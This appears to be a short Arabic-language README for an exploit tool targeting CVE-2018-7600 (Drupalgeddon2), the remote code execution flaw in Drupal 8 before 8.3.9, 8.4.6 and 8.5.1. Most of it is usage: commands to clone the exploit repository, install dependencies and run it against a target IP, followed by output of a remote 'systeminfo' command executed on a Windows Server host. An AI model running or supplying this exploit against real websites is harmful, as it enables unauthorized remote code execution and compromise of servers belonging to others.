
Drupal 8.x قبل 8.3.9، و8.4.x قبل 8.4.6، و8.5.x قبل 8.5.1 تسمح للمهاجمين عن بُعد بتنفيذ كود تعسفي بسبب مشكلة تؤثر على أنظمة فرعية متعددة مع تكوينات الوحدات الافتراضية أو الشائعة.
يعمل فقط على الإصدار 8، وليس 7.
git clone https://github.com/0xAJ2K/CVE-2018-7600.git
pip3 install -r requirements.txt
python3 CVE-2018-7600.py
python3 CVE-2018-7600.py -u http://172.31.1.27
kali :: /opt/myscripts » ./CVE-2018-7600.py -u http://172.31.1.27 -p http://127.0.0.1:8080
CMD: systeminfo
Host Name: Test
OS Name: Microsoft Windows Server 2019 Datacenter
OS Version: 10.0.17763 N/A Build 17763
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
<snip>